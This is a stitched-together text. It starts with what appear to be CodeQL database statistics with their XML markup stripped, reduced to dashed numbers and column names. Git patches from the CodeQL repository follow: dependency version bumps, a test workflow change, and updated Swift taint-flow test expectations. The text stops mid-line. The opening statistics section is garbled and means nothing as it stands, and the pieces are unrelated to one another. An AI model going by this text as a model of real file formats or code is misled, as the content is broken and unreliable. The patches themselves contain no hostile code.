-2 -1270313 - - - - - - -id -fileid - - -12 - - -1 -2 -1270313 - - - - - - -name -id - - -12 - - -1 -2 -420 - - -2 -5 -156 - - -5 -6 -3832 - - -6 -310317 -247 - - - - - - -name -parentid - - -12 - - -1 -2 -456 - - -2 -5 -150 - - -5 -6 -3829 - - -6 -161565 -220 - - - - - - -name -idx - - -12 - - -1 -2 -4358 - - -2 -35123 -297 - - - - - - -name -fileid - - -12 - - -1 -2 -486 - - -2 -5 -133 - - -5 -6 -3831 - - -6 -14503 -205 - - - - - - -parentid -id - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -name - - -12 - - -1 -2 -500482 - - -2 -3 -17866 - - -3 -4 -49117 - - -4 -45 -10556 - - - - - - -parentid -idx - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -fileid - - -12 - - -1 -2 -578021 - - - - - - -idx -id - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -name - - -12 - - -1 -2 -18457 - - -2 -3 -6533 - - -3 -4 -6178 - - -4 -8 -2624 - - -8 -4397 -1330 - - - - - - -idx -parentid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -fileid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -39722 -2083 - - - - - - -fileid -id - - -12 - - -1 -2 -20457 - - -2 -3 -3115 - - -3 -7 -3026 - - -7 -8 -3588 - - -8 -9 -2220 - - -9 -11 -3099 - - -11 -19 -3087 - - -19 -114506 -1129 - - - - - - -fileid -name - - -12 - - -1 -2 -20459 - - -2 -3 -3458 - - -3 -5 -2569 - - -5 -7 -2172 - - -7 -8 -6158 - - -8 -9 -3501 - - -9 -46 -1404 - - - - - - -fileid -parentid - - -12 - - -1 -2 -20457 - - -2 -3 -3870 - - -3 -5 -2152 - - -5 -6 -2876 - - -6 -7 -2720 - - -7 -8 -4132 - - -8 -14 -3096 - - -14 -31079 -418 - - - - - - -fileid -idx - - -12 - - -1 -2 -25894 - - -2 -3 -5301 - - -3 -4 -3787 - - -4 -6 -3268 - - -6 -35123 -1471 - - - - - - - - -xmlAttrs -1202020 - - -id -1202020 - - -elementid -760198 - - -name -3649 - - -value -121803 - - -idx -2000 - - -fileid -39448 - - - - -id -elementid - - -12 - - -1 -2 -1202020 - - - - - - -id -name - - -12 - - -1 -2 -1202020 - - - - - - -id -value - - -12 - - -1 -2 -1202020 - - - - - - -id -idx - - -12 - - -1 -2 -1202020 - - - - - - -id -fileid - - -12 - - -1 -2 -1202020 - - - - - - -elementid -id - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -name - - -12 - - -1 -2 -425778 - - -2 -3 -249579 - - -3 -4 -66475 - - -4 -2001 -18366 - - - - - - -elementid -value - - -12 - - -1 -2 -466237 - - -2 -3 -266291 - - -3 -46 -27670 - - - - - - -elementid -idx - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -fileid - - -12 - - -1 -2 -760198 - - - - - - -name -id - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -elementid - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -value - - -12 - - -1 -2 -3501 - - -2 -54146 -148 - - - - - - -name -idx - - -12 - - -1 -2 -3531 - - -2 -11 -118 - - - - - - -name -fileid - - -12 - - -1 -2 -3491 - - -2 -21768 -158 - - - - - - -value -id - - -12 - - -1 -2 -72032 - - -2 -3 -42366 - - -3 -199269 -7405 - - - - - - -value -elementid - - -12 - - -1 -2 -72036 - - -2 -3 -42374 - - -3 -199269 -7393 - - - - - - -value -name - - -12 - - -1 -2 -116722 - - -2 -2041 -5081 - - - - - - -value -idx - - -12 - - -1 -2 -117957 - - -2 -2001 -3846 - - - - - - -value -fileid - - -12 - - -1 -2 -86306 - - -2 -3 -28570 - - -3 -4175 -6927 - - - - - - -idx -id - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -elementid - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -name - - -12 - - -1 -2 -1955 - - -2 -189 -45 - - - - - - -idx -value - - -12 - - -1 -2 -1955 - - -2 -116643 -45 - - - - - - -idx -fileid - - -12 - - -1 -2 -1955 - - -2 -39449 -45 - - - - - - -fileid -id - - -12 - - -1 -2 -22884 - - -2 -4 -2565 - - -4 -6 -2294 - - -6 -7 -3299 - - -7 -9 -3272 - - -9 -16 -3143 - - -16 -129952 -1991 - - - - - - -fileid -elementid - - -12 - - -1 -2 -23890 - - -2 -4 -2131 - - -4 -5 -1971 - - -5 -6 -4096 - - -6 -8 -3519 - - -8 -16 -3137 - - -16 -106600 -704 - - - - - - -fileid -name - - -12 - - -1 -2 -22946 - - -2 -3 -2338 - - -3 -4 -2726 - - -4 -5 -2824 - - -5 -6 -2994 - - -6 -7 -3876 - - -7 -2002 -1744 - - - - - - -fileid -value - - -12 - - -1 -2 -22916 - - -2 -4 -2772 - - -4 -5 -2112 - - -5 -6 -3510 - - -6 -8 -1993 - - -8 -11 -3365 - - -11 -50357 -2780 - - - - - - -fileid -idx - - -12 - - -1 -2 -26133 - - -2 -3 -9699 - - -3 -5 -3511 - - -5 -2001 -105 - - - - - - - - -xmlNs -71201 - - -id -4185 - - -prefixName -958 - - -URI -4185 - - -fileid -39544 - - - - -id -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -id -URI - - -12 - - -1 -2 -4185 - - - - - - -id -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -prefixName -id - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -URI - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -fileid - - -12 - - -1 -2 -828 - - -2 -5 -73 - - -5 -24903 -57 - - - - - - -URI -id - - -12 - - -1 -2 -4185 - - - - - - -URI -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -URI -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -fileid -id - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - -fileid -prefixName - - -12 - - -1 -2 -11653 - - -2 -3 -25982 - - -3 -31 -1909 - - - - - - -fileid -URI - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - - - -xmlHasNs -1139730 - - -elementId -1139730 - - -nsId -4136 - - -fileid -39537 - - - - -elementId -nsId - - -12 - - -1 -2 -1139730 - - - - - - -elementId -fileid - - -12 - - -1 -2 -1139730 - - - - - - -nsId -elementId - - -12 - - -1 -5 -234 - - -5 -6 -3824 - - -6 -643289 -78 - - - - - - -nsId -fileid - - -12 - - -1 -5 -257 - - -5 -6 -3823 - - -6 -24759 -56 - - - - - - -fileid -elementId - - -12 - - -1 -2 -3669 - - -2 -3 -20429 - - -3 -7 -2536 - - -7 -8 -3473 - - -8 -9 -2258 - - -9 -11 -3036 - - -11 -18 -2966 - - -18 -147552 -1170 - - - - - - -fileid -nsId - - -12 - - -1 -2 -18261 - - -2 -3 -21032 - - -3 -8 -244 - - - - - - - - -xmlComments -26812 - - -id -26812 - - -text -22933 - - -parentid -26546 - - -fileid -26368 - - - - -id -text - - -12 - - -1 -2 -26812 - - - - - - -id -parentid - - -12 - - -1 -2 -26812 - - - - - - -id -fileid - - -12 - - -1 -2 -26812 - - - - - - -text -id - - -12 - - -1 -2 -21517 - - -2 -62 -1416 - - - - - - -text -parentid - - -12 - - -1 -2 -21519 - - -2 -62 -1414 - - - - - - -text -fileid - - -12 - - -1 -2 -21522 - - -2 -62 -1411 - - - - - - -parentid -id - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -text - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -fileid - - -12 - - -1 -2 -26546 - - - - - - -fileid -id - - -12 - - -1 -2 -26161 - - -2 -17 -207 - - - - - - -fileid -text - - -12 - - -1 -2 -26165 - - -2 -17 -203 - - - - - - -fileid -parentid - - -12 - - -1 -2 -26223 - - -2 -10 -145 - - - - - - - - -xmlChars -439958 - - -id -439958 - - -text -100518 - - -parentid -433851 - - -idx -4 - - -isCDATA -1 - - -fileid -26494 - - - - -id -text - - -12 - - -1 -2 -439958 - - - - - - -id -parentid - - -12 - - -1 -2 -439958 - - - - - - -id -idx - - -12 - - -1 -2 -439958 - - - - - - -id -isCDATA - - -12 - - -1 -2 -439958 - - - - - - -id -fileid - - -12 - - -1 -2 -439958 - - - - - - -text -id - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -parentid - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -idx - - -12 - - -1 -2 -100517 - - -2 -3 -1 - - - - - - -text -isCDATA - - -12 - - -1 -2 -100518 - - - - - - -text -fileid - - -12 - - -1 -2 -61284 - - -2 -4 -4205 - - -4 -5 -28328 - - -5 -351 -6701 - - - - - - -parentid -id - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -text - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -idx - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -isCDATA - - -12 - - -1 -2 -433851 - - - - - - -parentid -fileid - - -12 - - -1 -2 -433851 - - - - - - -idx -id - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -text - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -16 -17 -1 - - -100499 -100500 -1 - - - - - - -idx -parentid - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -isCDATA - - -12 - - -1 -2 -4 - - - - - - -idx -fileid - - -12 - - -4 -5 -1 - - -46 -47 -1 - - -97 -98 -1 - - -26494 -26495 -1 - - - - - - -isCDATA -id - - -12 - - -439958 -439959 -1 - - - - - - -isCDATA -text - - -12 - - -100518 -100519 -1 - - - - - - -isCDATA -parentid - - -12 - - -433851 -433852 -1 - - - - - - -isCDATA -idx - - -12 - - -4 -5 -1 - - - - - - -isCDATA -fileid - - -12 - - -26494 -26495 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -25303 - - -2 -35123 -1191 - - - - - - -fileid -text - - -12 - - -1 -2 -25765 - - -2 -35123 -729 - - - - - - -fileid -parentid - - -12 - - -1 -2 -25312 - - -2 -35123 -1182 - - - - - - -fileid -idx - - -12 - - -1 -2 -26397 - - -2 -5 -97 - - - - - - -fileid -isCDATA - - -12 - - -1 -2 -26494 - - - - - - - - -xmllocations -3051056 - - -xmlElement -2982460 - - -location -3051056 - - - - -xmlElement -location - - -12 - - -1 -2 -2978326 - - -2 -24903 -4134 - - - - - - -location -xmlElement - - -12 - - -1 -2 -3051056 - - - - - - - - -filetype -1102 - - -file -1102 - - -filetype -3 - - - - -file -filetype - - -12 - - -1 -2 -1102 - - - - - - -filetype -file - - -12 - - -1 -2 -1 - - -162 -163 -1 - - -939 -940 -1 - - - - - - - - -configs -69795 - - -id -69795 - - - - - -configNames -69794 - - -id -69794 - - -config -69794 - - -name -12859 - - - - -id -config - - -12 - - -1 -2 -69794 - - - - - - -id -name - - -12 - - -1 -2 -69794 - - - - - - -config -id - - -12 - - -1 -2 -69794 - - - - - - -config -name - - -12 - - -1 -2 -69794 - - - - - - -name -id - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - -name -config - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - - - -configValues -69691 - - -id -69691 - - -config -69691 - - -value -54399 - - - - -id -config - - -12 - - -1 -2 -69691 - - - - - - -id -value - - -12 - - -1 -2 -69691 - - - - - - -config -id - - -12 - - -1 -2 -69691 - - - - - - -config -value - - -12 - - -1 -2 -69691 - - - - - - -value -id - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - -value -config - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - - - -configLocations -209280 - - -locatable -209280 - - -location -209280 - - - - -locatable -location - - -12 - - -1 -2 -209280 - - - - - - -location -locatable - - -12 - - -1 -2 -209280 - - - - - - - - -extraction_time -378 - - -file -21 - - -extractionPhase -9 - - -timerKind -2 - - -time -43 - - - - -file -extractionPhase - - -12 - - -9 -10 -21 - - - - - - -file -timerKind - - -12 - - -2 -3 -21 - - - - - - -file -time - - -12 - - -3 -4 -21 - - - - - - -extractionPhase -file - - -12 - - -21 -22 -9 - - - - - - -extractionPhase -timerKind - - -12 - - -2 -3 -9 - - - - - - -extractionPhase -time - - -12 - - -1 -2 -8 - - -42 -43 -1 - - - - - - -timerKind -file - - -12 - - -21 -22 -2 - - - - - - -timerKind -extractionPhase - - -12 - - -9 -10 -2 - - - - - - -timerKind -time - - -12 - - -22 -23 -2 - - - - - - -time -file - - -12 - - -1 -2 -42 - - -21 -22 -1 - - - - - - -time -extractionPhase - - -12 - - -1 -2 -42 - - -8 -9 -1 - - - - - - -time -timerKind - - -12 - - -1 -2 -42 - - -2 -3 -1 - - - - - - - - -extraction_data -21 - - -file -21 - - -cacheFile -21 - - -fromCache -1 - - -length -21 - - - - -file -cacheFile - - -12 - - -1 -2 -21 - - - - - - -file -fromCache - - -12 - - -1 -2 -21 - - - - - - -file -length - - -12 - - -1 -2 -21 - - - - - - -cacheFile -file - - -12 - - -1 -2 -21 - - - - - - -cacheFile -fromCache - - -12 - - -1 -2 -21 - - - - - - -cacheFile -length - - -12 - - -1 -2 -21 - - - - - - -fromCache -file - - -12 - - -21 -22 -1 - - - - - - -fromCache -cacheFile - - -12 - - -21 -22 -1 - - - - - - -fromCache -length - - -12 - - -21 -22 -1 - - - - - - -length -file - - -12 - - -1 -2 -21 - - - - - - -length -cacheFile - - -12 - - -1 -2 -21 - - - - - - -length -fromCache - - -12 - - -1 -2 -21 - - - - - - - - - diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af..00000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From df3b30489b515c36ce9ecd112cca15a6154d70df Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:50:41 -0500 Subject: [PATCH 0697/1267] Add `--search-path` in test workflow --- .github/workflows/test.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 96fd8bdd1a4..9b07d1e7478 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,11 +27,11 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh repo clone github/codeql - codeql pack install "ql/lib" - codeql pack install "ql/src" - codeql pack install "ql/test" + codeql pack ci "ql/lib" + codeql pack ci "ql/src" + codeql pack ci "ql/test" - name: Run Tests env: GITHUB_TOKEN: ${{ github.token }} run: | - codeql test run ql/test + codeql test run --search-path "${{ github.workspace }}/extractor" ql/test From f0dc4f5ec32531fd22e06005b122b9f9edda3cd1 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 16:30:40 +0000 Subject: [PATCH 0698/1267] Swift: Convert the dataflow-taint-core-conversions test to labelled sources. --- .../dataflow/taint/core/LocalTaint.expected | 114 ++--- .../dataflow/taint/core/Taint.expected | 466 +++++++++--------- .../dataflow/taint/core/TaintInline.expected | 30 +- .../dataflow/taint/core/conversions.swift | 208 ++++---- 4 files changed, 409 insertions(+), 409 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index 06aba1f48bf..c0a08c715a8 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected @@ -17,46 +17,46 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | -| conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | -| conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | -| conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:30 | call to String.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | +| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | | conversions.swift:39:6:39:6 | SSA def(arr) | conversions.swift:40:12:40:12 | arr | | conversions.swift:39:6:39:6 | arr | conversions.swift:39:6:39:6 | SSA def(arr) | -| conversions.swift:39:12:39:30 | [...] | conversions.swift:39:6:39:6 | arr | +| conversions.swift:39:12:39:39 | [...] | conversions.swift:39:6:39:6 | arr | | conversions.swift:40:12:40:12 | arr | conversions.swift:41:12:41:12 | arr | | conversions.swift:41:12:41:12 | [post] arr | conversions.swift:42:20:42:20 | arr | | conversions.swift:41:12:41:12 | arr | conversions.swift:41:12:41:17 | ...[...] | | conversions.swift:41:12:41:12 | arr | conversions.swift:42:20:42:20 | arr | | conversions.swift:42:20:42:20 | arr | conversions.swift:43:20:43:20 | arr | | conversions.swift:43:12:43:23 | call to Array.init(_:) | conversions.swift:43:12:43:26 | ...[...] | -| conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:20:44:35 | .utf8 | -| conversions.swift:45:12:45:39 | call to Array.init(_:) | conversions.swift:45:12:45:42 | ...[...] | -| conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:20:45:35 | .utf8 | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | +| conversions.swift:45:12:45:48 | call to Array.init(_:) | conversions.swift:45:12:45:51 | ...[...] | +| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | | conversions.swift:47:5:47:9 | let ...? | conversions.swift:47:9:47:9 | v | | conversions.swift:47:9:47:9 | SSA def(v) | conversions.swift:48:13:48:13 | v | | conversions.swift:47:9:47:9 | v | conversions.swift:47:9:47:9 | SSA def(v) | -| conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:47:5:47:9 | let ...? | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:47:5:47:9 | let ...? | | conversions.swift:51:6:51:6 | SSA def(v2) | conversions.swift:52:12:52:12 | v2 | | conversions.swift:51:6:51:6 | v2 | conversions.swift:51:6:51:6 | SSA def(v2) | | conversions.swift:51:6:51:10 | ... as ... | conversions.swift:51:6:51:6 | v2 | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... | -| conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... | +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | | conversions.swift:54:6:54:6 | SSA def(v4) | conversions.swift:55:12:55:12 | v4 | | conversions.swift:54:6:54:6 | v4 | conversions.swift:54:6:54:6 | SSA def(v4) | | conversions.swift:54:6:54:10 | ... as ... | conversions.swift:54:6:54:6 | v4 | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... | -| conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | | conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | | conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | +| conversions.swift:57:11:57:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | | conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | | conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | +| conversions.swift:60:11:60:48 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | | conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | | conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | -| conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | -| conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | +| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | | conversions.swift:66:6:66:6 | SSA def(v8) | conversions.swift:67:12:67:12 | v8 | | conversions.swift:66:6:66:6 | v8 | conversions.swift:66:6:66:6 | SSA def(v8) | | conversions.swift:66:18:66:18 | 0 | conversions.swift:66:6:66:6 | v8 | @@ -64,13 +64,13 @@ | conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | | conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) | conversions.swift:71:12:71:37 | ...! | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) | conversions.swift:72:12:72:40 | ...! | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) | conversions.swift:75:12:75:42 | ...! | -| conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | -| conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | -| conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | -| conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | +| conversions.swift:71:12:71:45 | call to Self.init(exactly:) | conversions.swift:71:12:71:46 | ...! | +| conversions.swift:72:12:72:48 | call to Self.init(exactly:) | conversions.swift:72:12:72:49 | ...! | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) | conversions.swift:75:12:75:51 | ...! | +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | | conversions.swift:82:7:82:7 | SSA def(q1) | conversions.swift:83:12:83:12 | q1 | | conversions.swift:82:7:82:7 | q1 | conversions.swift:82:7:82:7 | SSA def(q1) | | conversions.swift:82:11:82:11 | SSA def(r1) | conversions.swift:84:12:84:12 | r1 | @@ -80,12 +80,12 @@ | conversions.swift:86:7:86:7 | q2 | conversions.swift:86:7:86:7 | SSA def(q2) | | conversions.swift:86:11:86:11 | SSA def(r2) | conversions.swift:88:12:88:12 | r2 | | conversions.swift:86:11:86:11 | r2 | conversions.swift:86:11:86:11 | SSA def(r2) | -| conversions.swift:86:17:86:63 | call to quotientAndRemainder(dividingBy:) | conversions.swift:86:6:86:13 | (...) | +| conversions.swift:86:17:86:72 | call to quotientAndRemainder(dividingBy:) | conversions.swift:86:6:86:13 | (...) | | conversions.swift:90:7:90:7 | SSA def(q3) | conversions.swift:91:12:91:12 | q3 | | conversions.swift:90:7:90:7 | q3 | conversions.swift:90:7:90:7 | SSA def(q3) | | conversions.swift:90:11:90:11 | SSA def(r3) | conversions.swift:92:12:92:12 | r3 | | conversions.swift:90:11:90:11 | r3 | conversions.swift:90:11:90:11 | SSA def(r3) | -| conversions.swift:90:17:90:66 | call to quotientAndRemainder(dividingBy:) | conversions.swift:90:6:90:13 | (...) | +| conversions.swift:90:17:90:75 | call to quotientAndRemainder(dividingBy:) | conversions.swift:90:6:90:13 | (...) | | conversions.swift:94:6:94:6 | SSA def(pair1) | conversions.swift:95:12:95:12 | pair1 | | conversions.swift:94:6:94:6 | pair1 | conversions.swift:94:6:94:6 | SSA def(pair1) | | conversions.swift:94:14:94:44 | call to addingReportingOverflow(_:) | conversions.swift:94:6:94:6 | pair1 | @@ -93,38 +93,38 @@ | conversions.swift:95:12:95:12 | pair1 | conversions.swift:96:12:96:12 | pair1 | | conversions.swift:98:6:98:6 | SSA def(pair2) | conversions.swift:99:12:99:12 | pair2 | | conversions.swift:98:6:98:6 | pair2 | conversions.swift:98:6:98:6 | SSA def(pair2) | -| conversions.swift:98:14:98:51 | call to addingReportingOverflow(_:) | conversions.swift:98:6:98:6 | pair2 | +| conversions.swift:98:14:98:60 | call to addingReportingOverflow(_:) | conversions.swift:98:6:98:6 | pair2 | | conversions.swift:99:12:99:12 | [post] pair2 | conversions.swift:100:12:100:12 | pair2 | | conversions.swift:99:12:99:12 | pair2 | conversions.swift:100:12:100:12 | pair2 | | conversions.swift:102:6:102:6 | SSA def(pair3) | conversions.swift:103:12:103:12 | pair3 | | conversions.swift:102:6:102:6 | pair3 | conversions.swift:102:6:102:6 | SSA def(pair3) | -| conversions.swift:102:14:102:54 | call to addingReportingOverflow(_:) | conversions.swift:102:6:102:6 | pair3 | +| conversions.swift:102:14:102:63 | call to addingReportingOverflow(_:) | conversions.swift:102:6:102:6 | pair3 | | conversions.swift:103:12:103:12 | [post] pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:103:12:103:12 | pair3 | conversions.swift:104:12:104:12 | pair3 | -| conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | -| conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | -| conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | -| conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | -| conversions.swift:114:12:114:34 | call to String.init(_:) | conversions.swift:114:12:114:36 | .utf8 | -| conversions.swift:114:19:114:33 | call to sourceFloat80() | conversions.swift:114:12:114:34 | call to String.init(_:) | -| conversions.swift:115:19:115:32 | call to sourceDouble() | 